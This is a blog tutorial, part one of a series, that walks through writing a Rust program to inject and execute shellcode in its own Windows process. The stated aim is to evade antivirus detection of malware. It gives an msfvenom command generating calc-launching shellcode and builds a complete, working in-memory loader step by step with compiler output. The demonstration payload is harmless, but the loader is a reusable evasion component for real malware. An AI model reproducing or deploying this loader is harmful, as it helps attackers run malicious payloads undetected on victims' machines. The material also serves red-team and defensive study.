Payload Injection on Windows Part I

05 Oct 2021

Hello! This is going to be a short series on malicious payload self-injection in Windows. The goal is to start easy by using normal userland Windows APIs, then move on to using undocumented API calls from NTDLL, and finally using Syswhispers to make system calls directly from our binary.

Why whould you want to inject a malicious payload into your own process?

Usually this is done to prevent AV from detecting your malware on disk. You can embed an encrypted payload within the process to get around signature detections, or you pull the malicious payload from the internet directly into memory so that the shellcode is never on disk at all.

This post will go over using the normal userland Windows APIs to allocate memory in our own process, write a payload to the memory, and then execute the payload. Before we get coding, lets talk about the Windows API quick.

The Windows API is a series of interfaces for developing applications for Windows devices. The API exposes functionality for interacting with almost all parts of the operating system including process and memory manipulation, file and registry operations, access token creation and more. Microsoft also has excellent documentation including some examples! We will be using the Windows API documentation throughout these and other blog series. You can check out the API documentation here.

With that out of the way, let's get started!

First we will create our malicious shellcode, in this case, just a simple exec calc shellcode.

kali@kali:~$ msfvenom -a x64 --platform windows -p windows/x64/exec CMD="calc.exe" -f raw > pop-calc.bin
No encoder specified, outputting raw payload
Payload size: 276 bytes

Now for the real code.

We'll be using Rust and the Winapi-rs crate to interact with the Windows API so we'll create a project called winapi-userland and add winapi to our Cargo.toml. According to the winapi documentation, the crate is broken up into modules which include the different functionality of the Windows API. We'll have to add minwindef and winnt for type definitions, and the memoryapi for memory functions to our Cargo.toml to use the required functions.

cargo new --bin winapi-userland

# Contents of Cargo.toml

[package]
name = "winapi-userland"
version = "0.1.0"
edition = "2018"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
winapi = { version = "0.3.9", features = ["minwindef", "winnt", "memoryapi"]}

The basic code execution path using userland APIs is the following: VirtualAllocate to allocate memory, WriteProcessMemory to write the payload to the memory location, then you typecast the memory location to a function pointer, and finally execute the function. We'll also use VirtualProtect to change the memory protections so we can avoid Read-Write-Execute memory pages and we'll use VirtualFree to free the memory afterward.

First, we'll include our payload in main. I love using the include_bytes macro for stuff like this, its super convenient. Next, we'll have to allocate some memory within our own process. We'll do this using the VirtualAlloc function. You can see the MSDN documentation for VirtualAlloc here but we'll using the Winapi-rs definition below.

pub unsafe extern "system" fn VirtualAlloc(
lpAddress: LPVOID,
    dwSize: SIZE_T,
    flAllocationType: DWORD,
    flProtect: DWORD
) -> LPVOID

I've annotated the call below with information about the arguments.

pub unsafe extern "system" fn VirtualAlloc(  
    lpAddress: LPVOID,   // Per MSDN we can pass a NULL pointer here
    dwSize: SIZE_T,   // size of the memory we are requesting 
    flAllocationType: DWORD,   // reserve or reserve and commit memory pages 
    flProtect: DWORD  // Memory region protections (read-write, read, execute, etc.)
) -> LPVOID

We'll include VirtualAlloc and some definitions from winapi, along with std::ptr for pointers, and try to call VirtualAlloc.

use std::ptr;
use winapi::um::memoryapi::VirtualAlloc;
use winapi::um::winnt::{MEM_RESERVE, MEM_COMMIT, PAGE_READWRITE};


fn main() {

	let payload = include_bytes!("pop-calc.bin");
	let memory = VirtualAlloc(ptr::null_mut(), payload.len(), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

	println!("Allocated memory at {:x?}!", memory);

}

and we run....

D:\projects\rust\blog\win-api\winapi-userland>cargo run
   Compiling winapi-userland v0.1.0 (D:\projects\rust\blog\win-api\winapi-userland)
error[E0133]: call to unsafe function is unsafe and requires unsafe function or block
 --> src\main.rs:7:18
  |
7 |     let memory = VirtualAlloc(ptr::null_mut(), payload.len(), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
  |                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ call to unsafe function
  |
  = note: consult the function's documentation for information on how to avoid undefined behavior

For more information about this error, try `rustc --explain E0133`.
error: could not compile `winapi-userland` due to previous error

Ah yes, it looks like calling the windows api using winapi-rs is unsafe. We'll have to wrap these function calls in "unsafe" tags to get it to work.

use std::ptr;
use winapi::um::memoryapi::VirtualAlloc;
use winapi::um::winnt::{MEM_RESERVE, MEM_COMMIT, PAGE_READWRITE};


fn main() {

	let payload = include_bytes!("pop-calc.bin");
	let memory = unsafe { VirtualAlloc(ptr::null_mut(), payload.len(), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)};

	println!("Allocated memory at {:x?}!", memory);

}

D:\projects\rust\blog\win-api\winapi-userland>cargo run
   Compiling winapi-userland v0.1.0 (D:\projects\rust\blog\win-api\winapi-userland)
    Finished dev [unoptimized + debuginfo] target(s) in 0.64s
     Running `target\debug\winapi-userland.exe`
Allocated memory at 0x25875330000!

Great! Looks like we're able to allocate some memory using VirtualAllocate. Now we can copy the bytes from our payload to the new memory location. Let's take a look at WriteProcessMemory.

pub unsafe extern "system" fn WriteProcessMemory(  
    hProcess: HANDLE,   // handle to the process containing the memory we're writing to. 
    lpBaseAddress: LPVOID,   // base address of writeable memory location
    lpBuffer: LPCVOID,   // pointer to the buffer that we want to write from
    nSize: SIZE_T,   // length of the data that we're writing.
    lpNumberOfBytesWritten: *mut SIZE_T  // variable that will contain the amount of bytes written during this call
) -> BOOL

To make it easy to get a handle to the current process, we'll add the processthreadsapi to the winapi crate in our Cargo.toml so that we can call the Windows GetCurrentProcess function.

The WriteProcessMemory function returns the number of bytes written via a mutable reference to a variable. This is pretty common for Windows functions so we'll create a mutable variable called bytes_written and use that to get our output.

For the process and memory handles, we'll use the handles from the VirtualAlloc and GetCurrentProcess calls. We can use the as_ptr() method on our byte array to get a pointer to the array and then cast it as *mut c_void. The len() method on our byte array will get us the length of the array and finally we can pass in a mut pointer to our bytes_written variable.

Instead of checking the result of the function, we'll just print bytes_written to see if we wrote any bytes.

use std::ptr;
use winapi::ctypes::c_void;
use winapi::um::memoryapi::{VirtualAlloc, WriteProcessMemory};
use winapi::um::processthreadsapi::GetCurrentProcess;
use winapi::um::winnt::{MEM_RESERVE, MEM_COMMIT, PAGE_READWRITE};


fn main() {

	let payload = include_bytes!("pop-calc.bin");
	
	let memory = unsafe { VirtualAlloc(ptr::null_mut(), payload.len(), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)};
	
	println!("Allocated memory at {:x?}!", memory);
	
	let handle = unsafe { GetCurrentProcess() };
	let mut bytes_written = 0;

	let _result = unsafe { WriteProcessMemory(handle, memory, payload.as_ptr() as *mut c_void, payload.len(), &mut bytes_written)};
	
	println!("{} bytes written!", bytes_written);

}

D:\projects\rust\blog\win-api\winapi-userland>cargo run
   Compiling winapi-userland v0.1.0 (D:\projects\rust\blog\win-api\winapi-userland)
    Finished dev [unoptimized + debuginfo] target(s) in 0.73s
     Running `target\debug\winapi-userland.exe`
Allocated memory at 0x1e692ee0000!
276 bytes written!

Ok, so far so good. Before we can execute our shellcode, we'll have to change the permissions on the memory that we allocated. We can do this using the VirtualProtect function.

pub unsafe extern "system" fn VirtualProtect(  
    lpAddress: LPVOID,   // address of beginning of the memory location
    dwSize: SIZE_T,  // size of memory location
    flNewProtect: DWORD,  // new protections (read-only, read-write, read-execute, etc) 
    lpflOldProtect: PDWORD  // pointer to a variable to receive the old protections
) -> BOOL

VirtualProtect also passes data out through a mut pointer to a variable so we'll create a variable called old_protect to get that data out. The rest of the arguments are pretty similar to those that we've used previously. We'll get the address from the memory variable, the size from the length of the payload, and we'll just pass in the new protection using definitions from winapi.

... unchanged ...
use winapi::um::memoryapi::{VirtualProtect, VirtualAlloc, WriteProcessMemory};
use winapi::um::processthreadsapi::GetCurrentProcess;
use winapi::um::winnt::{MEM_RESERVE, MEM_COMMIT, PAGE_READWRITE, PAGE_EXECUTE_READ};

fn main() {
... unchanged ...
    let mut old_protect = 0;
    let result = unsafe { VirtualProtect(memory, payload.len(), PAGE_EXECUTE_READ, &mut old_protect)};
    if result > 0 {
        println!("Sucessfully updated memory protections!");
	}
}

D:\projects\rust\blog\win-api\winapi-userland>cargo run
   Compiling winapi-userland v0.1.0 (D:\projects\rust\blog\win-api\winapi-userland)
    Finished dev [unoptimized + debuginfo] target(s) in 0.67s
     Running `target\debug\winapi-userland.exe`
Allocated memory at 0x271340e0000!
276 bytes written!
Sucessfully updated memory protections!

Great! We're almost there! Now we have to cast the pointer to our memory location, where the payload is written, to a function pointer, and then call the function.

We can cast the pointer to our memory location to a function pointer using std::mem::transmute. Since shellcode is likely using the C calling convention, we will use extern "C" to ensure the proper calling convention and we will ignore any returned values.

... unchanged ...
fn main() {
... unchanged ...
	if result > 0 {
 		println!("Sucessfully updated memory protections!");
 
 		let function = unsafe {
 			std::mem::transmute::<*mut c_void, unsafe extern "C" fn()>(memory)
		};
		unsafe { function(); }
	}
}

Let's run it!

Success! We have used the Windows API to allocate memory in our own process, write our payload to that memory, change the memory protections, and then execute the payload. Now a quick call to VirtualFree to free up the memory that we allocated.

Let's take a look at our current source code.

use std::ptr;
use winapi::ctypes::c_void;
use winapi::um::memoryapi::{VirtualProtect, VirtualAlloc, VirtualFree, WriteProcessMemory};
use winapi::um::processthreadsapi::GetCurrentProcess;
use winapi::um::winnt::{MEM_RESERVE, MEM_COMMIT, MEM_RELEASE, PAGE_READWRITE, PAGE_EXECUTE_READ};

fn main() {
    	let payload = include_bytes!("pop-calc.bin");
    
	let memory = unsafe { VirtualAlloc(ptr::null_mut(), payload.len(), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)};
    	println!("Allocated memory at {:x?}!", memory);
    
	let handle = unsafe { GetCurrentProcess() };
    
	let mut bytes_written = 0;
    
	let _result = unsafe { WriteProcessMemory(handle, memory, payload.as_ptr() as *mut c_void, payload.len(), &mut bytes_written)};
    
	println!("{} bytes written!", bytes_written);
    
	let mut old_protect = 0;
    
	let result = unsafe { VirtualProtect(memory, payload.len(), PAGE_EXECUTE_READ, &mut old_protect)};
    
	if result > 0 {
        println!("Sucessfully updated memory protections!");
        let function = unsafe {
            std::mem::transmute::<*mut c_void, unsafe extern "C" fn()>(memory)
        };
        unsafe { function(); }
	let _r = unsafe { VirtualFree(memory, payload.len(), MEM_RELEASE) }; 
    }
}

Note that we have a line in the program to call VirtualFree, however, the default shellcode generated by msfvenom includes a call to exit the process, so we will never reach that code. Additionally, this code may crash after calling the shellcode if the shellcode does not adhere to standard C calling convention and properly return to the callee (it usually doesnt).

Wow, that code contains a lot of unsafe. Check out part II where we create a wrapper for the windows API functions to make a safer interface.